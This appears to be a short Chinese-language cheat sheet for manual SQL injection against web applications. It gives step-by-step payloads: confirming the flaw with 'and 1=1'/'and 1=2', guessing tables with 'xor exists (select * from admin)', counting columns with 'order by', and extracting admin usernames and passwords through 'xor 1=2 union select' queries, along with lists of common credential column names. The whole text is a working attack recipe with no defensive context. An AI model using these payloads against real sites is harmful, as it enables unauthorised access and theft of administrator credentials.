1.检测是否存在注入漏洞

错误 and 1=1正常 and 1=2 错误

注入点:

2.猜解表段

  猜表段:xor exists (select * from 要猜解的表段的名字)

猜表段:xor exists (select * from admin)

3.猜解字段

   猜字段数:order by 要猜解的字段数  正确返回正常的页面,猜解错误的话返回错误的页面

猜字段数:order by 5  说明有5个字段数 

4..检测内容 后台账号

   xor 1=2 union select 1,2,3,4,5 from 要检测内容的表段

xor 1=2 union select 1,2,3,4,5 from admin  检测字段的内容

常见的字段内容username   user  name    admin_name

xor 1=2 union select 1,admin_name,3,4,5 from admin

5. 猜解密码 后台密码

常见的密码字段 pass  passwd password

xor 1=2 union select 1,admin_name,password,4,5 from admin